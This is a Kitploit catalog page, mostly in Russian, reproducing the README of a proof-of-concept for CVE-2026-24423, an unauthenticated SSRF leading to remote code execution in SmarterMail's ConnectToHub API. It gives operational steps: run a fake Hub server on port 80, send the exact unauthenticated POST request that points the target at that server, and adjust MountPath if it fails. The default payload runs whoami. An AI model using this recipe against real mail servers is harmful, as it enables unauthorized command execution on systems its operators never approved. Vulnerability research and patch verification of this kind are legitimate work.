Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24423 — Репродукционный скрипт для CVE-2026-24423 — нарушения границы доверия в SmarterMail ConnectToHub, приводящего к SSRF и потенциальному удалённому выполнению кода. Включает имитированный сервер Hub и инструкции по запуску уязвимого API. | Kitploit
Инструменты/GitHubGitHub/aavamin/cve-2026-24423
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubaavamin/cve-2026-24423

CVE-2026-24423

Репродукционный скрипт для CVE-2026-24423 — нарушения границы доверия в SmarterMail ConnectToHub, приводящего к SSRF и потенциальному удалённому выполнению кода. Включает имитированный сервер Hub и инструкции по запуску уязвимого API.

Репозиторий
816 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-24423

root@kitploit:~
# CVE-2026-24423 – Воспроизведение

> ⚠️ **Только для исследований в области безопасности и авторизованного тестирования / For security research and authorized testing only**


## Обзор (Overview)

Данный проект предназначен для воспроизведения уязвимости **CVE-2026-24423**.  
Уязвимость существует в функции **SmarterMail ConnectToHub**, её первопричина заключается в следующем:

- Интерфейс уровня администратора не требует аутентификации  
- Сервер активно подключается к указанному пользователем Hub (SSRF)  
- Данные, возвращаемые внешним Hub, напрямую используются для локальных операций системного уровня  

Данная уязвимость относится к **нарушению границ доверия на уровне проектирования (Trust Boundary Violation)** и в конечном итоге может привести к удалённому выполнению кода.

Данный репозиторий предназначен **только для проверки уязвимости и технических исследований**, а не для использования в качестве оружия.

Использование (Usage)

1️⃣ Запуск имитационного сервиса Hub

Start Hub Simulation Server

root@kitploit:~
python3 cve-2026-24423.py

Данный скрипт будет:

  • Прослушивать порт 80
  • Имитировать интерфейс SmarterMail Hub
  • Возвращать JSON-ответ, содержащий конфигурацию SystemMount

2️⃣ Запуск уязвимого интерфейса

Trigger the Vulnerable API

Используйте Yakit или Burp Suite для отправки запроса:

root@kitploit:~
POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: ip:port
Content-Type: application/json

{
  "hubAddress": "http://ip",
  "oneTimePassword": "test",
  "nodeName": "victim"
}

Данный интерфейс не требует аутентификации No authentication is required.


3️⃣ Устранение неполадок при воспроизведении

Troubleshooting

Если воспроизведение уязвимости не удалось:

  • Измените параметр MountPath в файле cve-2026-24423.py

4️⃣ Результат воспроизведения

Result

При успешном срабатывании уязвимости SmarterMail обработает данные, возвращённые Hub; код по умолчанию выполняет только команду whoami.

Пример / Example:

result


Благодарности (Credit)

Данный проект выполнен с помощью ChatGPT.

root@kitploit:~
Скачать инструмент